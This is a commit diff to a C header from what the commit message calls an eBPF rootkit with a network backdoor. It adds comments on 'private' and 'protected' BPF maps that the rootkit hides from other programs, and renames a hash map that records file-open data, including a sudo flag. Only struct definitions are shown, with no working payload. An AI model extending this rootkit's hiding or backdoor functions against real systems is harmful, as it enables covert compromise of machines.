Added new map structure, in preparation for new internal maps storing requested commands via the network backdoor

src/ebpf/include/bpf/defs.h

@@ -6,10 +6,15 @@
 //Tasks and comms
 #define TASK_COMM_LEN 16
 
+
+/*PRIVATE MAPS*/
+//Any attempt to access these maps will be blocked by the rookit
+
 //File system data of a running program which opened some fd
 #define FS_OPEN_DATA_PROGRAM_NAME_SIZE 16
 #define FS_OPEN_DATA_FILENAME_SIZE 16
-struct fs_open_data{
+
+struct fs_open_data{ //Map value
 	char* buf;
 	int fd;
 	__u32 pid;
@@ -18,11 +23,17 @@ struct fs_open_data{
 	int is_sudo;
 };
 
-struct fs_open{
+struct fs_priv_open{ //Map
 	__uint(type, BPF_MAP_TYPE_HASH);
 	__uint(max_entries, 4096);
 	__type(key, __u64); //thread group id(MSB) + pid (LSB)
 	__type(value, struct fs_open_data);
 } fs_open SEC(".maps");
 
+
+
+/*PROTECTED MAPS*/
+//Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted
+//Located at /src/map_prot.h
+
 #endif